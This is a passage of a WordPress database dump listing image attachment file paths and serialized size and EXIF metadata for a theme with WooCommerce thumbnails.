0\";s:8:\"keywords\";a:0:{}}}'),(51623,4325,'_wp_attachment_image_alt','j'),(51624,1703,'_wp_attached_file','2018/08/blog-post-img-11.jpg'),(51625,1703,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:645;s:4:\"file\";s:28:\"2018/08/blog-post-img-11.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"blog-post-img-11-300x149.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"blog-post-img-11-1024x508.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"blog-post-img-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"blog-post-img-11-768x381.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:28:\"blog-post-img-11-650x645.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:28:\"blog-post-img-11-650x645.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"blog-post-img-11-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"blog-post-img-11-600x298.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"blog-post-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"blog-post-img-11-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"blog-post-img-11-600x298.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"blog-post-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51626,4324,'_wp_attachment_image_alt','d'),(51627,4327,'_wp_attached_file','2018/08/h3-img-gallery-4.jpg'),(51628,4327,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:550;s:4:\"file\";s:28:\"2018/08/h3-img-gallery-4.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"h3-img-gallery-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51629,4328,'_wp_attached_file','2018/08/h5-rev-img-2.jpg'),(51630,4328,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1625;s:6:\"height\";i:725;s:4:\"file\";s:24:\"2018/08/h5-rev-img-2.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-2-300x134.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2-1024x457.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:457;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-2-768x343.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:343;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2-1536x685.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:685;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-2-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-2-650x725.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2-1300x725.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"h5-rev-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-2-600x268.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:268;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-2-600x268.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:268;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51631,4327,'_wp_attachment_image_alt','j'),(51632,1703,'_wp_attachment_image_alt','d'),(51633,1751,'_wp_attached_file','2018/08/h5-bacground-img-1-scaled.jpg'),(51634,4326,'_wp_attachment_image_alt','m'),(51635,4329,'_wp_attached_file','2018/08/h3-img-gallery-5.jpg'),(51636,4329,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:550;s:4:\"file\";s:28:\"2018/08/h3-img-gallery-5.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"h3-img-gallery-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51637,4330,'_wp_attached_file','2018/08/h2-port-img-1a.jpg'),(51638,4330,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:630;s:4:\"file\";s:26:\"2018/08/h2-port-img-1a.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"h2-port-img-1a-300x145.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"h2-port-img-1a-1024x496.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:496;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-port-img-1a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"h2-port-img-1a-768x372.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"h2-port-img-1a-650x630.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:630;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h2-port-img-1a-650x630.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:630;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"h2-port-img-1a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"h2-port-img-1a-600x291.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:291;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-port-img-1a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"h2-port-img-1a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"h2-port-img-1a-600x291.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:291;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-port-img-1a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51639,4329,'_wp_attachment_image_alt','b'),(51640,1751,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:892;s:6:\"height\";i:2560;s:4:\"file\";s:37:\"2018/08/h5-bacground-img-1-scaled.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h5-bacground-img-1-105x300.jpg\";s:5:\"width\";i:105;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"h5-bacground-img-1-357x1024.jpg\";s:5:\"width\";i:357;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h5-bacground-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h5-bacground-img-1-768x2204.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:2204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"h5-bacground-img-1-535x1536.jpg\";s:5:\"width\";i:535;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:31:\"h5-bacground-img-1-714x2048.jpg\";s:5:\"width\";i:714;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:30:\"h5-bacground-img-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:31:\"h5-bacground-img-1-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:31:\"h5-bacground-img-1-650x1300.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:32:\"h5-bacground-img-1-1300x1300.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h5-bacground-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h5-bacground-img-1-600x1722.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:1722;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h5-bacground-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"h5-bacground-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h5-bacground-img-1-600x1722.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:1722;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h5-bacground-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:22:\"h5-bacground-img-1.jpg\";}'),(51641,4328,'_wp_attachment_image_alt','m'),(51642,4330,'_wp_attachment_image_alt','m'),(51643,1364,'_wp_attachment_image_alt','m'),(51644,1509,'_wp_attachment_image_alt','t'),(51645,4331,'_wp_attached_file','2018/08/h5-img-1.jpg'),(51646,4331,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:292;s:6:\"height\";i:542;s:4:\"file\";s:20:\"2018/08/h5-img-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-1-162x300.jpg\";s:5:\"width\";i:162;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-1-292x375.jpg\";s:5:\"width\";i:292;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h5-img-1-292x375.jpg\";s:5:\"width\";i:292;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51647,4332,'_wp_attached_file','2018/08/h3-img-gallery-6.jpg'),(51648,4332,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:1100;s:4:\"file\";s:28:\"2018/08/h3-img-gallery-6.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-6-150x300.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"h3-img-gallery-6-512x1024.jpg\";s:5:\"width\";i:512;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-6-550x650.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-6-550x650.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"h3-img-gallery-6-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-6-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51649,4331,'_wp_attachment_image_alt','m'),(51650,4333,'_wp_attached_file','2018/08/h2-port-img-2a.jpg'),(51651,4333,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:630;s:4:\"file\";s:26:\"2018/08/h2-port-img-2a.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"h2-port-img-2a-300x145.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"h2-port-img-2a-1024x496.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:496;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-port-img-2a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"h2-port-img-2a-768x372.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"h2-port-img-2a-650x630.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:630;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h2-port-img-2a-650x630.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:630;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"h2-port-img-2a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"h2-port-img-2a-600x291.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:291;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-port-img-2a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"h2-port-img-2a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"h2-port-img-2a-600x291.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:291;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-port-img-2a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51652,1388,'_wp_attached_file','2018/08/pin-img-2.png'),(51653,1388,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:38;s:6:\"height\";i:45;s:4:\"file\";s:21:\"2018/08/pin-img-2.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51654,1388,'_wp_attachment_image_alt','m'),(51655,1525,'_wp_attached_file','2018/08/h3-team-spec-member.jpg'),(51656,1525,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:595;s:6:\"height\";i:395;s:4:\"file\";s:31:\"2018/08/h3-team-spec-member.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h3-team-spec-member-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-team-spec-member-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h3-team-spec-member-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i